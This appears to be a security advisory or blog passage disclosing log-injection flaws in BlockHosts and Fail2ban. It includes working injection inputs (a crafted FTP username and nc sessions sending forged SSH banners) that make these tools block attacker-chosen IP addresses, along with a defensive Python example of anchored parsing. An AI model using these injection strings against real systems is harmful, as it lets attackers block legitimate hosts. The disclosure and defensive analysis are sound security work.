Vulnerable programs
We used DenyHosts in our previous example because it is one of the most famous tools out there, but it is not the only one that is vulnerable.


The latest version of BlockHosts (2.0.3) is also vulnerable to log injection via the vsftpd and SSH logs. The reason is the same as with DenyHosts: loose regular expressions.

root@slacker:~# ftp 192.168.3.4
220 Welcome to labs ossec candy FTP service.
Name (192.168.2.3:root): lala] FAIL LOGIN: Client "2.3.4.54"
..

(looking at the logs)
Mon Jun 2 21:06:02 2007 [pid 1452] [lala] FAIL LOGIN: Client "2.3.4.54" ] FAIL LOGIN: Client "192.168.3.1"

If we pass a modified user name in order to inject an IP address, BlockHosts blocks the injected IP address instead of the real client address:
root@slacker:~# cat /etc/hosts.deny
#---- BlockHosts Additions
ALL: 2.3.4.54 : deny
..
#---- BlockHosts Additions

With the SSH logs, the issue is the same as with DenyHosts. If we inject any data into the protocol identification field, BlockHosts parses our fake IP address instead of the real one (the exploit for DenyHosts works against BlockHosts with just a slight change, left as an exercise for the reader).
dcid@enigma:~$ nc 192.168.5.1 22
SSH-1.99-OpenSSH_3.9p1
sshd[123]: User myself from 1.5.6.7 not allowed

Protocol mismatch.

(the logs):
Jun 4 14:49:46 slacker sshd[4153]: Bad protocol version identification 'sshd[123]: User myself from 1.5.6.7 not allowed ' from 10.1.1.14

root@slacker:~# cat /etc/hosts.deny
#---- BlockHosts Additions
ALL: 1.5.6.7 : deny
..
#---- BlockHosts Additions

*The BlockHosts author, Avinash Chopde, has released a patch for this issue.


The latest version of Fail2ban (0.8) is vulnerable to the same injection via the SSH logs as DenyHosts and BlockHosts. It looks for "ROOT LOGIN REFUSED" anywhere in the logs and, as previously shown, we can easily inject that string using the bad protocol identification message from sshd.
dcid@enigma:~$ nc 192.168.5.1 22
SSH-1.99-OpenSSH_3.9p1
ROOT LOGIN REFUSED hi FROM 1.5.6.7
Protocol mismatch.

(the logs):
Jun 4 14:49:46 slacker sshd[4153]: Bad protocol version identification 'ROOT LOGIN REFUSED hi FROM 1.5.6.7 ' from 10.1.1.14

*The Fail2ban author, Cyril Jaquier, has released a patch for this issue.

**This issue is similar to CVE-2006-6302, but uses a different vector. Thanks to Cyril Jaquier for pointing it out to me.
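The root cause in all three tools (the vsftpd and SSH cases above) is that the blocker matches a fragment anywhere in the line instead of parsing the fields the daemon itself writes. The following is an added illustration, not code from this post or from BlockHosts, Fail2ban or DenyHosts: the loose patterns are my reconstruction of the behaviour described, the sample log lines are constructed, and the anchored patterns show the parsing that a log-based blocker should use.

```python
import re

# Constructed sample lines modelled on the ones quoted in the post (not real
# captures): a genuine vsftpd failure, the injected vsftpd username, and the
# sshd "Bad protocol version identification" line echoing attacker input.
VSFTPD_GENUINE = 'Mon Jun  2 21:05:11 2007 [pid 1450] [bob] FAIL LOGIN: Client "192.168.3.1"'
VSFTPD_INJECTED = ('Mon Jun  2 21:06:02 2007 [pid 1452] [lala] FAIL LOGIN: Client "2.3.4.54" ] '
                   'FAIL LOGIN: Client "192.168.3.1"')
SSHD_INJECTED = ("Jun  4 14:49:46 slacker sshd[4153]: Bad protocol version identification "
                 "'ROOT LOGIN REFUSED hi FROM 1.5.6.7 ' from 10.1.1.14")

IP = r'(\d{1,3}(?:\.\d{1,3}){3})'

# Loose matching in the style the post criticises (my reconstruction, not the
# tools' real patterns): the first hit anywhere in the line wins, so text the
# client chose (the username, the SSH banner) decides which address is blocked.
LOOSE_VSFTPD = re.compile(r'FAIL LOGIN: Client "' + IP + r'"')
LOOSE_SSHD = re.compile(r'ROOT LOGIN REFUSED.*FROM ' + IP)

# Anchored matching: trust only the fields the daemon writes itself. vsftpd
# appends the peer address after the user-supplied name, and sshd appends
# "from <peer>" after the quoted (attacker-controlled) banner, so the address
# immediately before end-of-line is the real one. A greedy ".*" plus "$" folds
# any injected copies earlier in the line into the untrusted field.
STRICT_VSFTPD = re.compile(
    r'^\w{3} \w{3} +\d+ \d\d:\d\d:\d\d \d{4} \[pid \d+\] \[.*\] FAIL LOGIN: Client "' + IP + r'"$')
STRICT_SSHD = re.compile(
    r"sshd\[\d+\]: Bad protocol version identification '.*' from " + IP + r'$')


def offending_ip(line, strict=True):
    """Return the address a blocker would act on for this line, or None.

    strict=False reproduces the loose behaviour described in the post;
    strict=True uses only the anchored patterns above.
    """
    patterns = (STRICT_VSFTPD, STRICT_SSHD) if strict else (LOOSE_VSFTPD, LOOSE_SSHD)
    for pattern in patterns:
        match = pattern.search(line)
        if match:
            return match.group(1)
    return None


if __name__ == "__main__":
    for line in (VSFTPD_GENUINE, VSFTPD_INJECTED, SSHD_INJECTED):
        print("loose -> %-12s strict -> %s" % (offending_ip(line, strict=False),
                                                 offending_ip(line)))
```

Run against the two injected lines, the loose patterns return the attacker-supplied 2.3.4.54 and 1.5.6.7 while the anchored ones return the real peers, 192.168.3.1 and 10.1.1.14.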